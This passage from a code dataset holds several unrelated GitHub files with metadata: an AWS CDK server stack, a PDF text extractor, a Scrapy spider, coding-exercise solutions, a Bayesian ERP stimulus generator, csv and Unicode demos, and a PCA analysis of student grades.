self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(80),\n \"HTTP\")\n self.MgmtSG.add_ingress_rule(ec2.Peer.ipv4(mgsg_peer),\n ec2.Port.tcp(443),\n \"HTTPS\")\n\n ### Key Pair for mgmt server ####\n\n key1 = KeyPair(self,\"KeyPair2\",\n name=\"MgmtServerKey\",\n store_public_key=True,\n resource_prefix=\"K\"\n )\n \n key1.grant_read_on_private_key(role1)\n key1.grant_read_on_public_key(role1)\n\n ######## Launch Management server( EC2 Instance ) ########\n \n self.instance2 = ec2.Instance(self, \"mgmtServer\",\n instance_type=ec2.InstanceType(\"t2.micro\"),\n machine_image=amzn_windows,\n vpc = vpc2,\n block_devices= [ec2.BlockDevice(\n device_name=\"/dev/sda1\", \n volume=ec2.BlockDeviceVolume.ebs(\n volume_size= 30,\n # volume_type=ec2.EbsDeviceVolumeType.GP2,\n encrypted=True\n ),\n # mapping_enabled= True\n )],\n \n role=role1,\n security_group = self.MgmtSG,\n key_name=key1.key_pair_name\n )\n","repo_name":"techgrounds/cloud-6-repo-rupaliBC","sub_path":"projectFinal/project_final/MgmtServer.py","file_name":"MgmtServer.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29875384792","text":"import argparse\nimport logging\nimport os\n\nimport pdfplumber\n\n\ndef convert_file(source, dest=None, **kwargs):\n if not dest:\n dest = source.replace(\".pdf\", \".txt\")\n\n logging.info(\"Converting {} to {}\".format(source, dest))\n with pdfplumber.open(source) as pdf, open(dest, \"w\", encoding=\"utf8\") as destfile:\n text = \"\\n----\\n\".join(\n [p.extract_text() for p in pdf.pages if p.extract_text()]\n )\n destfile.write(text)\n\n\ndef convert_folder(source, **kwargs):\n for f in os.listdir():\n if f.endswith(\".pdf\"):\n convert_file(f)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"Extract text from a PDF to a text file\"\"\"\n )\n parser.add_argument(\n \"-v\", \"--verbose\", action=\"store_true\", help=\"More descriptive output\"\n )\n\n subparsers = parser.add_subparsers(help=\"Operation to perform\")\n\n folder_parser = subparsers.add_parser(\n \"folder\", help=\"Convert all PDF files in a folder to txt\"\n )\n folder_parser.add_argument(\n \"--source\", default=\".\", help=\"Folder in which to look for PDFs\"\n )\n folder_parser.set_defaults(func=convert_folder)\n\n file_parser = subparsers.add_parser(\"file\", help=\"Convert a PDF file to TXT\")\n file_parser.add_argument(\"source\", help=\"PDF file to convert\")\n file_parser.add_argument(\"--dest\", default=None, help=\"destination file\")\n file_parser.set_defaults(func=convert_file)\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n\n args.func(**args.__dict__)\n","repo_name":"drkane/charity-account-fetch","sub_path":"extract_text.py","file_name":"extract_text.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"36467192321","text":"# -*- coding:utf-8 -*-\nfrom . 
import JaySpider\nfrom ..items.areatrend_item import AreatrendItem\nfrom ..utils import CustomLoader, enrich_wrapper, extract_specs\n\n\nclass AreatrendSpider(JaySpider):\n name = \"areatrend\"\n item_xpath = ('//div[@class=\"product-item-info\"]/div/a/@href',)\n page_xpath = (r'(.*?)(p=1)(\\d+)(.*)',)\n\n custom_settings = {\n \"ITEM_PIPELINES\": {\n 'crawling.pipelines.%s_pipeline.%sKafkaPipeline' % (name, name.capitalize()): None if JaySpider.debug else 100,\n 'crawling.pipelines.%s_pipeline.%sFilePipeline' % (name, name.capitalize()): 100 if JaySpider.debug else None,\n },\n \"SPIDER_MIDDLEWARES\": {\n 'scrapy.contrib.spidermiddleware.depth.DepthMiddleware': None,\n 'crawling.spidermiddlewares.InfluxDBMiddleware': 990,\n 'crawling.spidermiddlewares.AreatrendMiddleware': 991,\n }\n }\n\n @staticmethod\n def get_base_loader(response):\n return CustomLoader(item=AreatrendItem())\n\n @enrich_wrapper\n def enrich_data(self, item_loader, response):\n self.logger.debug(\"Start to enrich data. \")\n item_loader.add_xpath(\"product_id\", '//div[@class=\"product attribute sku\"]/div[@class=\"value\"]/text()')\n item_loader.add_xpath(\"model_number\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"part_number\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"mpn\", '//td[@data-th=\"Style\"]/text()')\n item_loader.add_xpath(\"title\", '//h1[@class=\"page-title\"]/span/text()')\n item_loader.add_re(\"skus\", r'\"jsonConfig\": ({.+}),')\n item_loader.add_xpath(\"old_price\", ['//span[@class=\"old-price\"]//span[@class=\"price\"]/text()',\n '//div[@class=\"product-info-price\"]//span[@class=\"price\"]/text()'])\n item_loader.add_xpath(\"special_price\", '//span[@class=\"special-price\"]//span[@class=\"price\"]/text()')\n item_loader.add_re(\"color_size\", r'\"jsonSwatchConfig\": ({.+}),')\n item_loader.add_xpath(\"features\", '//div[@class=\"value\"]/ul/li/text()')\n item_loader.add_re(\"color_images\", r'\"data\": (\\[[\\S\\s]+?\\]),')\n item_loader.add_xpath(\"description\", '//div[@class=\"product attribute description\"]/div/text()')\n item_loader.add_xpath(\"detail\", '//div[@id=\"additional\"]')\n item_loader.add_value(\"specs\", extract_specs(response.selector, '//table[@id=\"product-attribute-specs-table\"]//tr'))\n item_loader.add_value(\"availability\", True)\n\n def need_duplicate(self, url):\n return url","repo_name":"ShichaoMa/old-spider","sub_path":"jay-scraper/crawling/spiders/areatrend_spider.py","file_name":"areatrend_spider.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"30093514303","text":"class Solution:\n def maxAreaOfIsland(self, grid: List[List[int]]) -> int:\n if not grid:\n return 0\n rows = len(grid)\n cols = len(grid[0])\n\n def dfs(r, c):\n if (min(r, c) < 0) or (r >= rows or c >= cols) or (grid[r][c] == 0):\n return 0\n grid[r][c] = 0 #\n d = dfs(r+1, c) \n u = dfs(r-1, c)\n right = dfs(r, c+1)\n l = dfs(r, c-1)\n return d + u + right + l + 1 #include current cell, which is 1\n\n area = 0\n for r in range(rows):\n for c in range(cols):\n #if current cell is part of island, \n #perform DFS & update area if it's larger than current max\n area = max(area, dfs(r, c)) \n return 
area\n\n\n","repo_name":"mandyliou/leetcode","sub_path":"max-area-of-island/max-area-of-island.py","file_name":"max-area-of-island.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7042777959","text":"from collections import Counter\nimport itertools\nimport logging\nimport re\nfrom typing import Callable, List, NamedTuple, Tuple, Optional, Dict\n\nimport numpy as np\nimport torch.distributions as dist\nimport torch\nfrom torch.nn.functional import pad\nfrom torchtyping import TensorType\nimport transformers\nfrom transformers import AutoModelForCausalLM, AutoTokenizer # type: ignore\nfrom transformers.tokenization_utils_base import BatchEncoding\nfrom tqdm.auto import tqdm, trange\n\nfrom berp.datasets.processor import NaturalLanguageStimulusProcessor\nfrom berp.typing import DIMS, is_probability, is_log_probability\n\n\nL = logging.getLogger(__name__)\n\n# Type variables\nB, N_W, N_C, N_F, N_P, V_W = DIMS.B, DIMS.N_W, DIMS.N_C, DIMS.N_F, DIMS.N_P, DIMS.V_W\nT, S = DIMS.T, DIMS.S\n\n\nclass Stimulus(NamedTuple):\n\n word_lengths: TensorType[N_W, torch.int]\n phoneme_onsets: TensorType[N_W, N_P, torch.float]\n phoneme_onsets_global: TensorType[N_W, N_P, torch.float]\n word_onsets: TensorType[N_W, torch.float]\n word_offsets: TensorType[N_W, torch.float]\n word_surprisals: TensorType[N_W, torch.float]\n p_candidates: TensorType[N_W, N_C, torch.float, is_log_probability]\n candidate_phonemes: TensorType[N_W, N_C, N_P, torch.long]\n\n\ndef align_to_sample_rate(times, sample_rate):\n \"\"\"\n Adjust the time series so that each event happens aligned to the left edge of\n a sample, assuming the given sample rate.\n \"\"\"\n return torch.round(times * sample_rate) / sample_rate\n\n\nclass StimulusGenerator(object):\n\n def __init__(self,\n phon_delay_range: Tuple[float, float] = (0.08, 0.2),\n word_delay_range: Tuple[float, float] = (0.1, 0.4)):\n self.phon_delay_range = phon_delay_range\n self.word_delay_range = word_delay_range\n\n self.first_onset = 1.0 # TODO magic to make epoching not break\n\n def __call__(self, *args, **kwargs) -> Stimulus:\n raise NotImplementedError()\n\n def sample_stream(self, word_lengths: TensorType[N_W, int],\n max_num_phonemes: int,\n align_sample_rate: Optional[int] = None,\n ) -> Tuple[TensorType[N_W, N_P, float],\n TensorType[N_W, N_P, float],\n TensorType[N_W, float],\n TensorType[N_W, float]]:\n num_words = len(word_lengths)\n\n phoneme_durations = rand_unif(*self.phon_delay_range, num_words, max_num_phonemes)\n phoneme_durations[torch.arange(max_num_phonemes) >= word_lengths.unsqueeze(1)] = 0.\n\n word_delays = rand_unif(*self.word_delay_range, num_words)\n word_delays[0] = 0.\n\n if align_sample_rate is not None:\n phoneme_durations = align_to_sample_rate(phoneme_durations, align_sample_rate)\n word_delays = align_to_sample_rate(word_delays, align_sample_rate)\n\n # Remaining variables are deterministic derivatives on the above.\n\n phoneme_onsets = torch.cat([\n torch.zeros(num_words, 1),\n phoneme_durations.cumsum(dim=1)[:, :-1]\n ], dim=1)\n phoneme_offsets = phoneme_durations.cumsum(dim=1)\n\n word_durations = phoneme_offsets[:, -1] - phoneme_onsets[:, 0]\n\n # Mask out phonemes past word length\n phoneme_onsets[torch.arange(max_num_phonemes) >= word_lengths.unsqueeze(1)] = 0.\n phoneme_offsets[torch.arange(max_num_phonemes) > word_lengths.unsqueeze(1)] = 0.\n\n out_of_bounds_mask = torch.arange(max_num_phonemes).unsqueeze(0) >= 
word_lengths.unsqueeze(1)\n assert (out_of_bounds_mask[:, 1:] | (phoneme_offsets[:, :-1] <= phoneme_onsets[:, 1:])).all().item()\n\n word_onsets = (torch.cat([torch.tensor([self.first_onset]),\n word_durations[:-1]])\n + word_delays).cumsum(0)\n word_offsets = word_onsets + word_durations\n\n assert (word_offsets[:-1] < word_onsets[1:]).all().item()\n \n # Make phoneme_onsets global (not relative to word onset).\n phoneme_onsets_global = phoneme_onsets + word_onsets.view(-1, 1)\n\n return phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets\n\n\ndef rand_unif(low, high, *shape) -> torch.Tensor:\n return torch.rand(*shape) * (high - low) + low\n\n\nclass RandomStimulusGenerator(StimulusGenerator):\n\n def __init__(self,\n num_words: int = 100,\n num_candidates: int = 10,\n num_phonemes: int = 5,\n phoneme_voc_size: int = 18,\n word_surprisal_params: Tuple[float, float] = (1., 0.5),\n **kwargs):\n super().__init__(**kwargs)\n\n self.num_words = num_words\n self.num_candidates = num_candidates\n self.num_phonemes = num_phonemes\n self.word_surprisal_params = word_surprisal_params\n\n # Generate phoneme set\n self.phonemes = np.array(list(\"abcdefghijklmnopqrstuvwxyz\"[:phoneme_voc_size - 1] + \"_\"))\n self.phoneme2idx = {p: idx for idx, p in enumerate(self.phonemes)}\n\n def __call__(self, **stream_kwargs) -> Stimulus:\n word_lengths = 1 + dist.Binomial(self.num_phonemes - 1, 0.5) \\\n .sample((self.num_words, self.num_candidates)).long() # type: ignore\n gt_word_lengths = word_lengths[:, 0]\n\n candidate_phonemes = torch.randint(0, len(self.phonemes) - 2,\n (self.num_words,\n self.num_candidates,\n self.num_phonemes))\n # Use padding token when word length exceeded.\n # TODO can have candidates with different lengths\n pad_idx = self.phoneme2idx[\"_\"]\n pad_mask = (torch.arange(self.num_phonemes) >= word_lengths[:, :, None])\n candidate_phonemes[pad_mask] = pad_idx\n\n phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets = \\\n self.sample_stream(gt_word_lengths, self.num_phonemes, **stream_kwargs)\n\n word_surprisals: torch.Tensor = dist.LogNormal(*self.word_surprisal_params) \\\n .sample((self.num_words,)) # type: ignore\n\n # Calculate p_candidates using surprisal; allocate remainder randomly\n p_gt_word = (-word_surprisals).exp()\n remainder = 1 - p_gt_word\n p_candidates = (remainder / (self.num_candidates - 1)).view(-1, 1) \\\n * torch.ones(self.num_words, self.num_candidates - 1)\n p_candidates = torch.cat([p_gt_word.view(-1, 1), p_candidates], dim=1) \\\n .log()\n\n return Stimulus(gt_word_lengths, phoneme_onsets, phoneme_onsets_global,\n word_onsets, word_offsets,\n word_surprisals, p_candidates, candidate_phonemes)\n\n\nclass NaturalLanguageStimulusGenerator(StimulusGenerator):\n\n def __init__(self, *args, **kwargs):\n super().__init__()\n self.processor = NaturalLanguageStimulusProcessor(*args, **kwargs)\n\n def __call__(self, tokens: List[str],\n word_features: Dict[int, torch.Tensor],\n word_to_token: Optional[Dict[int, List[int]]] = None,\n ground_truth_phonemes: Optional[Dict[int, List[str]]] = None) -> Stimulus:\n\n if word_to_token is None:\n # Assume words are the same as tokens\n assert len(word_features) == len(tokens)\n word_to_token = {idx: [idx] for idx in word_features}\n \n nl_stim = self.processor(tokens, word_to_token, word_features, ground_truth_phonemes)\n\n max_num_phonemes = nl_stim.candidate_phonemes.shape[2]\n phoneme_onsets, phoneme_onsets_global, word_onsets, word_offsets = \\\n self.sample_stream(nl_stim.word_lengths, 
max_num_phonemes)\n\n return Stimulus(\n nl_stim.word_lengths, phoneme_onsets, phoneme_onsets_global,\n word_onsets, word_offsets,\n nl_stim.word_surprisals, nl_stim.p_candidates, nl_stim.candidate_phonemes\n )","repo_name":"hans/bayesian-erp","sub_path":"berp/generators/stimulus.py","file_name":"stimulus.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11266179995","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\n'''\n测试csv库demo示例\n'''\nimport csv\n\n# csv.reader类\n# 官方解释可以任意可迭代的对象,也可以是文件(open文件需要参数newline,定义行与行的分割界限)\n\n\ndef test_reader():\n with open(\"userscore.csv\", newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='|')\n for row in csvreader:\n print(','.join(row))\n\n\ndef test_writer():\n with open(\"eggs.csv\", 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csvwriter.writerow(['spam'] * 5 + ['Baked Beans'])\n csvwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\n\ndef test_writer_2():\n with open('mydata.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['id', 'name', 'age'])\n writer.writerow(['10002', 'LiSi', '20'])\n writer.writerow(['10001', 'ZhangSan', 18])\n\n\ndef csv_dict_write(path, head, data):\n with open(path, 'w', encoding='utf-8', newline='') as f:\n writer = csv.DictWriter(f, head)\n writer.writeheader()\n writer.writerows(data)\n return True\n\n\ndef csv_dict_read(path):\n with open(path, 'r', encoding='utf-8') as f:\n reader = csv.DictReader(f, dialect='excel')\n for row in reader:\n print(row['Name'])\n\n\nif __name__ == \"__main__\":\n # test_reader()\n # test_writer()\n # test_writer_2()\n\n # head = ['Name', 'Age']\n # data = [\n # {'Name': 'Keys', 'Age': 28},\n # {'Name': 'HongPing', 'Age': 29},\n # {'Name': 'WenChao', 'Age': 15}\n # ]\n # csv_dict_write('test2.csv', head, data)\n\n csv_dict_read('test2.csv')\n\n","repo_name":"doever/rmms","sub_path":"rmms/baselibrary/demo_02_csv.py","file_name":"demo_02_csv.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25252251452","text":"import math\n\nwith open(\"day_03/day_03.txt\") as f:\n data = [line.strip() for line in f.readlines()]\n\ngradients = [\n (1,1),\n (3,1),\n (5,1),\n (7,1),\n (1,2),\n]\n\ndef count_trees(gradient):\n\n tree_count = 0\n x = 0\n width = len(data[0])\n delta_x, delta_y = gradient\n\n for y in range(0, len(data), delta_y):\n if '#' in data[y][x % width]:\n tree_count +=1\n x += delta_x\n return tree_count\n\ntotal_trees = []\n\nfor i in gradients:\n total_trees.append(count_trees(i))\n\nprint(math.prod(total_trees))\n\n# Answer is: 6419669520","repo_name":"jmcharter/advent_of_code_2020","sub_path":"day_03/d3_part_two.py","file_name":"d3_part_two.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35042624720","text":"# This exercise demonstrates a few concepts:\n# How computers store languages for display and processing\n# How you must encode and decode Python's strings into a type called bytes\n# How to handle errors in strings and byte-handling\n# How to read code and find out what it means even if I've never seen it before\n\nimport sys\nscript, input_encoding, error = sys.argv\n# There are a few error inputs we can accept. 
'strict' will generate an exception and fail. Other could e.g. replace unencodable unicode with a '?'.\n\ndef main(language_file, encoding, errors):\n # We use the parameter 'encoding', though Python refers to a codec.\n # Examples are utf-8, utf-16, big5.\n line = language_file.readline()\n\n if line:\n print_line(line, encoding, errors) # Call the function below that runs on each line of the language file.\n return main(language_file, encoding, errors) # Go back to the main function and run it again. It will keep running for as long as there is another line to be read into the variable called line.\n\ndef print_line(line, encoding, errors):\n next_lang = line.strip() # strip() removes leading and trailing characters from a string input. E.g. line.strip(\",.abc\") would remove all instances of those 5 characters from the end of each line until reaching another type of character.\n raw_bytes = next_lang.encode(encoding, errors=errors) # If user inputs utf-8 as encoding, then this will encode the language name as utf-8\n cooked_string = raw_bytes.decode(encoding, errors=errors) # This decodes what we just encoded, using the same encoding. It should get us back to what we had, if our errors are strict.\n\n print(raw_bytes, \"<===>\", cooked_string) # When we print raw_bytes, we see a load of hexadecimal numbers for each byte, within a b'...' which indicates a byte-string. I guess this is like an f-string, but it's a b-string.\n\n\nlanguages = open(\"languages.txt\", encoding = \"utf-8\")\n\n# utf-8 means Unicode Transformation Format 8 Bits. Generally, using 32 bits to store every character is a waste of space. But sometimes we need the extra to render less-frequent languages such as Lithuanian. utf-8 is a form of compression encoding that solves for this issue.\n\n# Give the main function a file object (above), plus the user's argv inputs for encoding and error.\nmain(languages, input_encoding, error)\n\n# If we run this script with big5 encoding, Python doesn't have much fun. That's because our language file has lots of other characters in it. To make it work, we have to change the error setting to 'replace' - then Python just fills in ? 
for all the characters it can't handle in big5.\n","repo_name":"anglpf/python3","sub_path":"ex23.py","file_name":"ex23.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1860573661","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 21 15:13:21 2021\n\n@author: paulnelsonbecker\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.linalg import svd\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom similarity import similarity,binarize\nfrom categoric2numeric import categoric2numeric\n\nfilename = 'student-mat2.csv'\ndf = pd.read_csv(filename, \";\")\n\n\n# =============================================================================\n# print(round(df.describe(),1))\n# # correlation matrix \n# corr = df.corr()\n# print(round(corr,1))\n# =============================================================================\n###########\nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\n\n# =============================================================================\n# ##############\n# df.hist(column=['school','sex','Medu','Fedu','Mjob','Fjob','reason','guardian','traveltime','studytime','failures','schoolsup','famsup','paid','activities','higher','internet','goout','Dalc','Walc','health','absences','G3'],figsize=(10,10))\n# plt.savefig('distribution.png',dpi=300,bbox_inches='tight')\n# ################\n# sns.lineplot(df['G3'], df['absences'])\n# plt.savefig('lineplot.png',dpi=300,bbox_inches='tight')\n# ###############\n# fig, ax = plt.subplots(figsize=(10,10)) \n# sns.heatmap(round(df.corr(),1), annot=True)\n# plt.savefig('heatmap.png',dpi=300,bbox_inches='tight')\n# plt.show\n# =============================================================================\n\nraw_data = df.values \n\n\ncols = range(0, 26) \nX = raw_data[:, cols]\n\n\nattributeNames = np.asarray(df.columns[cols])\n#print(attributeNames)\n\nclassLabels = raw_data[:,-1] # -1 takes the last column\n\nclassNames = np.unique(classLabels)\nclassGroups = np.array([5,10,15,20])\n\nclassDict2 = dict(zip(classNames,np.array([0,0,0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3])))\nclassDict = dict(zip(classNames,range(len(classNames))))\n\n\ny = np.array([classDict[cl] for cl in classLabels])\n#####groups of grades##########\ny2 = np.array([classDict2[cl] for cl in classLabels])\n\n\nN, M = X.shape\n\nC = len(classNames)\n\n\npca_data = X\npca_names = attributeNames\n\n##Transform categoric variables to one-out-of-K coding:\n##MJOb\nX_num, attribute_names = categoric2numeric(pca_data[:,5])\nfirsthalfnames = np.concatenate((pca_names[0:5],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[6:26]))\nfirsthalf = np.concatenate((pca_data[:,0:5], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,6:26]), axis=1)\n\n#print(pca_names)\n#print(pca_data.shape)\n\n##FJOB\nX_num, attribute_names = categoric2numeric(pca_data[:,10])\nfor i in range(len(attribute_names)):\n attribute_names[i] = 'F ' + attribute_names[i] \nfirsthalfnames = np.concatenate((pca_names[0:10],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[11:30]))\nfirsthalf = np.concatenate((pca_data[:,0:10], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,11:30]), axis=1)\n\n\npca_names = np.concatenate((pca_names[0:15],pca_names[16:34]))\npca_data = np.concatenate((pca_data[:,0:15], pca_data[:,16:34]), axis=1)\n\ncount = 0;\n\n# Bin School\nfor i in range(N):\n if 
(pca_data[i,0]==\"GP\"):\n pca_data[i,0] = 1\n \n else:\n pca_data[i,0] = 0\n \n\n# Bin Female\nfor i in range(N):\n if (pca_data[i,1]==\"F\"):\n pca_data[i,1] = 1\n \n else:\n pca_data[i,1] = 0\n \n\n\n\n\n# Bin schoolsup\nfor i in range(N):\n if (pca_data[i,19]==\"yes\"):\n pca_data[i,19] = 1\n \n else:\n pca_data[i,19] = 0\n \n\n# Bin famsup\nfor i in range(N):\n if (pca_data[i,20]==\"yes\"):\n pca_data[i,20] = 1\n \n else:\n pca_data[i,20] = 0\n \n\n#BIn paid\nfor i in range(N):\n if (pca_data[i,21]==\"yes\"):\n pca_data[i,21] = 1\n \n else:\n pca_data[i,21] = 0\n \n \nfor i in range(N):\n if (pca_data[i,22]==\"yes\"):\n pca_data[i,22] = 1\n \n else:\n pca_data[i,22] = 0\n \n \nfor i in range(N):\n \n if (pca_data[i,23]==\"yes\"):\n pca_data[i,23] = 1\n \n else:\n pca_data[i,23] = 0\n \n \nfor i in range(N):\n if (pca_data[i,24]==\"yes\"):\n pca_data[i,24] = 1\n \n else:\n pca_data[i,24] = 0\n \nX_num, attribute_names = categoric2numeric(pca_data[:,15])\nfirsthalfnames = np.concatenate((pca_names[0:15],attribute_names))\npca_names = np.concatenate((firsthalfnames,pca_names[16:36]))\nfirsthalf = np.concatenate((pca_data[:,0:15], X_num),axis=1)\npca_data = np.concatenate((firsthalf, pca_data[:,16:36]), axis=1)\npca_data_noGrades = pca_data[:,0:32]\npca_names_noGrades = pca_names[0:32]\ny = pca_data[:,34]\n\ndf = pd.DataFrame(pca_data, columns=['school', 'sex','age', 'Medu', 'Fedu', 'at_home', 'health', 'other', 'services',\n 'teacher', 'F at_home', 'F health', 'F other', 'F services', 'F teacher',\n 'father','mother','other', 'traveltime', 'studytime', 'failures', 'schoolsup', 'famsup',\n 'paid', 'activities', 'higher', 'internet', 'goout', 'Dalc', 'Walc', 'health',\n 'absences', 'G1', 'G2', 'G3'])\n\n \n \n#WITHOUT GRADES:\npca_data = pca_data_noGrades\npca_names = pca_names_noGrades\ndf = pd.DataFrame(pca_data, columns=['school', 'sex','age', 'Medu', 'Fedu', 'at_home', 'health', 'other', 'services',\n 'teacher', 'F at_home', 'F health', 'F other', 'F services', 'F teacher',\n 'father','mother','other', 'traveltime', 'studytime', 'failures', 'schoolsup', 'famsup',\n 'paid', 'activities', 'higher', 'internet', 'goout', 'Dalc', 'Walc', 'health',\n 'absences'])\n\n\n\n\n\ndf.to_csv('k-encoding.csv',index=True)\n\nN, M = pca_data.shape\n\npca_data = pca_data.astype(np.int)\n\n#Y = pca_data - np.ones((N,1))*pca_data.mean(axis=0)\n#Y2 = Y*(1/np.std(Y,0))\nY2 = pca_data\n\n\n# =============================================================================\n# #####PLOT 1-STANDARD DEVIATION########\n# print(\"______________________________________\")\n# r = np.arange(1,pca_data.shape[1]+1)\n# plt.bar(r, np.std(pca_data,0))\n# plt.xticks(r, pca_names, rotation='vertical')\n# plt.ylabel('Standard deviation')\n# plt.xlabel('Attributes')\n# plt.title('Students: attribute standard deviations')\n# plt.savefig('std.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# #####################\n# \n# =============================================================================\n\nU,S,V = svd(Y2,full_matrices=False)\n\n\n# Compute variance explained by principal components\nrho = (S*S) / (S*S).sum() \n\n# Compute the projection onto the principal components\nZ = U*S;\n######PLOT 1.5-Projected data#####\n# =============================================================================\n# C = len(classGroups)\n# for c in range(C):\n# plt.plot(Z[y2==c,0], Z[y2==c,1], '.', alpha=.5)\n# plt.xlabel('PC'+str(0+1))\n# plt.ylabel('PC'+str(1+1))\n# plt.title('Projection' )\n# plt.legend(classGroups)\n# plt.axis('equal')\n# 
plt.savefig('projection.png',dpi=300,bbox_inches='tight')\n# =============================================================================\n\n\n\nthreshold = 0.9\n\n#####PLOT 2-VARIANCE EXPLAINED########\n# =============================================================================\n# plt.figure()\n# plt.plot(range(1,len(rho)+1),rho,'x-')\n# plt.plot(range(1,len(rho)+1),np.cumsum(rho),'o-')\n# plt.plot([1,len(rho)],[threshold, threshold],'k--')\n# plt.title('Variance explained by principal components');\n# plt.xlabel('Principal component');\n# plt.ylabel('Variance explained');\n# plt.legend(['Individual','Cumulative','Threshold'])\n# plt.grid()\n# plt.savefig('variance.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# \n# =============================================================================\n\n#####################PLOT 3-PCA Coefficients#####\n\n\n# =============================================================================\nvt = V.T\n# pcs = [0,1]\n# legendStrs = ['PC'+str(e+1) for e in pcs]\n# bw = .2\n# r = np.arange(1,M+1)\n# for i in pcs: \n# plt.bar(r+i*bw, vt[:,i], width=bw)\n# plt.xticks(r+bw, pca_names, rotation='vertical')\n# plt.xlabel('Attributes')\n# plt.ylabel('Component coefficients')\n# plt.legend(legendStrs)\n# plt.grid()\n# plt.title('PCA Component Coefficients')\n# plt.savefig('pcomponents.png',dpi=300,bbox_inches='tight')\n# plt.show()\n# =============================================================================\n\n# =============================================================================\npcs = [1]\nlegendStrs = ['PC'+str(e+1) for e in pcs]\nbw = .2\nr = np.arange(1,M+1)\nfor i in pcs: \n plt.bar(r+i*bw, vt[:,i], width=bw)\nplt.xticks(r+bw, pca_names, rotation='vertical')\nplt.xlabel('Attributes')\nplt.ylabel('Component coefficients')\nplt.legend(legendStrs)\nplt.grid()\nplt.title('PCA Component Coefficients')\nplt.show()\n# \n# =============================================================================\n\n\n\n# =============================================================================\n# #########Similarity school####\n# i=0\n# noti = list(range(0,2))+list(range(21,27))\n# print(pca_names[noti])\n# # Compute similarity between image i and all others\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=1\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=21\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=22\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=23\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=24\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=25\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# i=26\n# sim1 = similarity(pca_data[:,i], pca_data[:,noti].T, 'smc')\n# print(sim1)\n# \n# =============================================================================\n\n","repo_name":"schollenkopf/MachineLearning","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":9763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23879533596","text":"\nclass Graph:\n\n def __init__(self, vertices):\n self.V = vertices\n self.adj = [[] for i in range(vertices)]\n\n def addEdge(self, u, v):\n self.adj[u].append(v)\n self.adj[v].append(u)\n\n def DFS(self, v, visited):\n visited[v] = True\n for i in 
self.adj[v]:\n if visited[i] == False:\n self.DFS(i, visited)\n \n\n def connectedComponents(self):\n visited = [False] * (self.V)\n cc = 0\n for v in range(self.V):\n if visited[v] == False:\n cc += 1\n self.DFS(v, visited)\n return cc\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for i in range(t):\n x = input()\n if(' ' not in x):\n m = int(input())\n n = int(x)\n else:\n n,m = x.split()\n g = Graph(int(n))\n for j in range(int(m)):\n x,y = map(int, input().split())\n g.addEdge(x-1, y-1)\n CC = g.connectedComponents()\n if(CC == 1):\n print(\"Caso #{}: a promessa foi cumprida\".format(i+1))\n else:\n print(\"Caso #{}: ainda falta(m) {} estrada(s)\".format(i+1, CC-1)) \n \n","repo_name":"projeto-de-algoritmos/Grafos1_Exerciciosresolvidos","sub_path":"1835/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5627203119","text":"#! 